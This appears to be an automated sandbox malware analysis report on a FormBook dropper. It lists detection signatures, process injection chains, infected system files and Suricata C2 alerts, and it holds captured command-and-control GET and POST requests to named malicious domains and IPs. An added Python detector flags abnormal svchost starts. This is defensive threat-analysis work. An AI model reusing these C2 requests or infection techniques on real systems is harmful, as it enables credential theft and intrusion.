

Windows Analysis Report
MA-DS-2024-03 URGENT.exe

Overview

General Information

Sample name: MA-DS-2024-03 URGENT.exe
Analysis ID: 1572587
MD5: b5c0bc1ca5223c4b18328235497a2ef6
SHA1: 23836ce6cfd0bf6617527366879bf36fcd9d3e26
SHA256: ec01b76e956bceeec02a2bf5004ec837639562729f5ea4fd61f2f9f1ea0e803f
Tags: exe, user-James_inthe_box

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MA-DS-2024-03 URGENT.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe" MD5: B5C0BC1CA5223C4B18328235497A2EF6)
    • svchost.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fbLIkXRoMf.exe (PID: 6824 cmdline: "C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 8188 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • fbLIkXRoMf.exe (PID: 564 cmdline: "C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 7316 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: A7B2833265E5E73E4BC1B1899D393D76)
  • alg.exe (PID: 7352 cmdline: C:\Windows\System32\alg.exe MD5: 114ADFAB8A4E69539FC98ABAB86561C6)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7512 cmdline: C:\Windows\system32\AppVClient.exe MD5: 70844A25E3B4375DA206E6793BBE1975)
  • cleanup
No configs have been found
Yara matches on memory dumps:

Source | Rule | Description | Author | Strings
00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further memory-dump entries not shown)

Yara matches on unpacked PE files:

Source | Rule | Description | Author | Strings
4.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ParentImage: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, ParentProcessId: 7252, ParentProcessName: MA-DS-2024-03 URGENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ProcessId: 7384, ProcessName: svchost.exe
Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ParentImage: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, ParentProcessId: 7252, ParentProcessName: MA-DS-2024-03 URGENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ProcessId: 7384, ProcessName: svchost.exe
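The two Sigma hits above both fire on the same fact: svchost.exe (PID 7384) was started by the dropper rather than by services.exe, and its command line is the dropper's own path rather than anything naming svchost.exe, which is the classic artifact of a process-hollowing CreateProcess call. The following is an added example (not Joe Sandbox or Sigma code) that applies those three checks to process-creation records; the ProcEvent field names are an assumed subset of a Sysmon Event ID 1 record, and the two sample events are constructed, the first mirroring the data on this page.

```python
"""Flag svchost.exe process-creation events that do not look like the real
service host: wrong parent, wrong image path, or a command line that does
not even name svchost.exe (the hollowing artifact seen in this report).
Added example; not Joe Sandbox or Sigma code."""
import ntpath
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Assumed subset of a Sysmon Event ID 1 / Windows 4688 record."""
    image: str
    command_line: str
    parent_image: str


LEGIT_SVCHOST = r"c:\windows\system32\svchost.exe"


def svchost_anomalies(ev: ProcEvent) -> list:
    """Return the reasons an svchost.exe start looks abnormal ([] if it looks fine)."""
    if ntpath.basename(ev.image).lower() != "svchost.exe":
        return []  # not an svchost start; nothing to evaluate
    reasons = []
    parent = ntpath.basename(ev.parent_image).lower() or "<none>"
    if parent != "services.exe":
        reasons.append(f"parent is {parent}, not services.exe")
    if ev.image.lower() != LEGIT_SVCHOST:
        reasons.append(f"image path {ev.image} is not the System32 service host")
    cl = ev.command_line.lower()
    if "svchost" not in cl:
        reasons.append("command line does not name svchost.exe (hollowing artifact)")
    elif " -k " not in cl:
        reasons.append("no -k <service group> argument")
    return reasons


# Constructed sample events: the first mirrors the Sigma data on this page,
# the second is what a legitimate Task Scheduler host start looks like.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\SysWOW64\svchost.exe",
        command_line=r'"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"',
        parent_image=r"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\svchost.exe",
        command_line=r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
        parent_image=r"C:\Windows\System32\services.exe",
    ),
]


def triage(events) -> dict:
    """Map image path -> anomaly list for every event that has findings."""
    findings = {}
    for ev in events:
        reasons = svchost_anomalies(ev)
        if reasons:
            findings[ev.image] = reasons
    return findings


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS).items():
        print(image)
        for reason in reasons:
            print("  -", reason)
```

The parent check alone reproduces the "Uncommon Svchost Parent Process" rule; the command-line check is the one worth keeping even where the parent is spoofed, because a hollowed process keeps whatever lpCommandLine the dropper passed.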
Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:00:10.940466+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49817 | 217.70.184.50 | 80 | TCP
2024-12-10T18:00:36.220714+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49876 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:52.084329+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49913 | 38.165.29.234 | 80 | TCP
2024-12-10T18:01:07.032477+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49952 | 13.248.169.48 | 80 | TCP

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:00:28.160763+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49857 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:30.848420+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49863 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:33.520193+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49870 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:43.692594+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49896 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:46.368010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49902 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:49.020270+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49908 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:58.856713+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49932 | 13.248.169.48 | 80 | TCP
2024-12-10T18:01:01.616313+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49938 | 13.248.169.48 | 80 | TCP
2024-12-10T18:01:04.487555+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49944 | 13.248.169.48 | 80 | TCP

Suricata alerts, SID 2850851 (ETPRO MALWARE Win32/Expiro.NDO CnC Activity):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T17:59:06.883022+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 54.244.188.177 | 80 | TCP


                AV Detection

Source: MA-DS-2024-03 URGENT.exe, Avira: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: MA-DS-2024-03 URGENT.exe, ReversingLabs: Detection: 81%
Source: Yara match, File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe, Joe Sandbox ML: detected
Source: MA-DS-2024-03 URGENT.exe, Joe Sandbox ML: detected
Source: MA-DS-2024-03 URGENT.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253573729.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fbLIkXRoMf.exe, 00000010.00000000.1675751246.000000000003E000.00000002.00000001.01000000.00000005.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2499888410.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp

                Spreading

Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, System file written: C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC

                Networking

Source: Network traffic, Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49699 -> 54.244.188.177:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49817 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49857 -> 154.23.184.207:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49863 -> 154.23.184.207:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49870 -> 154.23.184.207:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49876 -> 154.23.184.207:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49896 -> 38.165.29.234:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49908 -> 38.165.29.234:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49913 -> 38.165.29.234:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49902 -> 38.165.29.234:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49932 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49938 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49944 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49952 -> 13.248.169.48:80
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, IP Address: 54.244.188.177
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_004722EE
Source: global traffic, HTTP traffic detected: GET /px6j/?PNE=e0RPRf4HVNE&66Sxjp=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1 Host: www.sunnyz.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE HTTP/1.1 Host: www.d48dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE HTTP/1.1 Host: www.8312zcksnu.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE HTTP/1.1 Host: www.snyp.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic, DNS traffic detected: DNS query: www.sunnyz.store
Source: global traffic, DNS traffic detected: DNS query: www.d48dk.top
Source: global traffic, DNS traffic detected: DNS query: www.8312zcksnu.bond
Source: global traffic, DNS traffic detected: DNS query: www.snyp.shop
Source: unknown, HTTP traffic detected: POST /usxsp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 830
